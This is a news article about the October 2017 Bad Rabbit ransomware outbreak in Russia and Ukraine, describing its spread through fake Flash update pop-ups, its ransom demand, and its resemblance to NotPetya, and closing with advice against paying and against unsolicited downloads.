On Tuesday (October 24, 2017), a new ransomware attack dubbed Bad Rabbit hit the critical infrastructures of Eastern Europe: Ukraine’s Odessa International Airport, Kiev subway, and multiple Russian news agencies were affected by this data-encrypting malware.
While the primary targets of the cyber attack seem to be organizations in Russia and Ukraine, the ransomware has also infected computer systems in Turkey, Bulgaria, Germany, Japan and other nations, as reported by a security firm.
The way Bad Rabbit spreads is through a drive-by download. Some popular websites were infected by injecting Javascript into their HTML body or into one of the .js files. Unlike earlier ransomware attacks that spread on their own, Bad Rabbit requires input from a victim: once a user visits a compromised site, a pop-up asking to update Flash Player shows up and lures into downloading the malware.
What happens next? The computer gets infected, and files become encrypted and inaccessible after the malicious file is installed. Then, the user is directed to a page with a ransom message demanding to pay 0.05 Bitcoins (approximately $275) – and this should be done within 41 hours to retrieve access to the system and encrypted files. When the given time runs out, the ransom price goes up.
It is unclear who are the creators of the Bad Rabbit ransomware. The only thing known is that they are fans of Game of Thrones. As noticed by the vigilant ones, malware code contains references to Grey Worm and Daenerys’ dragons – the characters of the trending TV series.
BadRabbit shows some similarities to NotPetya, the ransomware-like attack that has hit Windows computers in Europe and the US this summer. Both of the attacks have been constructed using similar methods and target many of the same geographical locations.
However, as noted by security researchers, unlike NotPetya and WannaCry, Bad Rabbit isn’t built on Eternal Blue, the Windows exploit leaked from the NSA (National Security Agency).
As malware researcher James Emery-Callcott reports to BBC, the ransomware campaign is slowly dying down: “As far as I can see, the attacker’s server is no longer live and most of the infected sites hosting the script that gives the Flash update prompt.”
While the actual intentions of the attackers are unknown, everyone affected is advised not to pay the requested ransom, as there is no guarantee it will give you back the access to the encrypted data.
Bad Rabbit is the third massive ransomware outbreak this year, following the WannaCry and NotPetya cyber attacks. It serves as a reminder to every Internet user to be cautious and never ever download and open unsolicited applications from Flash pop-ups – even if they say it’s a necessary update.